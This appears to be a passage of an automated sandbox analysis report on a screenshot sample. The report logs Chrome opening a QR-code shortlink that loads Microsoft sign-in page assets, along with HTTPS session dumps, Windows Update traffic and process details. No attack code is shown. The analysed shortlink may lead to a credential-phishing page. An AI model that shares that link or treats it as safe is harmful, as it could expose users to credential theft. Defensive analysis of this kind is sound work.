2024-04-16 09:44:01 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49724	13.107.246.41	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	438	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: 347bd172-d01e-0073-6c21-8f6a98000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094401Z-r1f585c6b652whcnm5ddu23pd400000004f0000000001wpm x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-16 09:44:01 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49723	13.107.246.41	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	421	OUT	GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	805	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F49C21D98 x-ms-request-id: 205f2221-901e-0023-4645-8e09ab000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094401Z-r1f585c6b65b4rm4gtddvcdsd000000003eg000000001e8n x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 09:44:01 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49725	13.107.213.41	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	416	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	799	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 048c7887-d01e-0063-46e2-8fdaba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094401Z-18655757dbczz695ax75e6u4mc000000027g000000004ekd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 09:44:01 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49735	23.63.206.91	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 09:44:06 UTC	468	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=163172 Date: Tue, 16 Apr 2024 09:44:06 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49736	23.63.206.91	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:06 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 09:44:07 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=163181 Date: Tue, 16 Apr 2024 09:44:07 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-16 09:44:07 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49737	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:16 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pg2x9vAWVXfG9+A&MD=9Sc+AKcL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-16 09:44:17 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 5419797b-32ec-43d8-a07c-0f838f7ff953 MS-RequestId: 8f397061-9bf7-48b9-bce9-3f5d26b4eb92 MS-CV: YJci9A52BUqg2a23.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 16 Apr 2024 09:44:16 GMT Connection: close Content-Length: 24490
2024-04-16 09:44:17 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-16 09:44:17 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49741	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:54 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pg2x9vAWVXfG9+A&MD=9Sc+AKcL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-16 09:44:55 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: a3b1f06c-4189-4977-a8e5-d4b3bcb1dd2b MS-RequestId: a5f61153-7abd-477d-88eb-b7fe2532cd0c MS-CV: Noy2LM6o1ki3z2N3.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 16 Apr 2024 09:44:54 GMT Connection: close Content-Length: 25457
2024-04-16 09:44:55 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-16 09:44:55 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mspaint.exePID: 4872, Parent PID: 2880

General

Target ID:	0
Start time:	11:43:54
Start date:	16/04/2024
Path:	C:\Windows\SysWOW64\mspaint.exe
Wow64 process (32bit):	true
Commandline:	mspaint.exe "C:\Users\user\Desktop\2024-04-16_11h42_39.png"
Imagebase:	0x9c0000
File size:	743'424 bytes
MD5 hash:	986A191E95952C9E3FE6BE112FB92026
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3468, Parent PID: 5088

General

Target ID:	2
Start time:	11:43:55
Start date:	16/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.qrfy.com/hbfzkBMQ4s
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3092, Parent PID: 3468

General

Target ID:	3
Start time:	11:43:55
Start date:	16/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2072,i,2155693389170485184,14401983771675100146,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly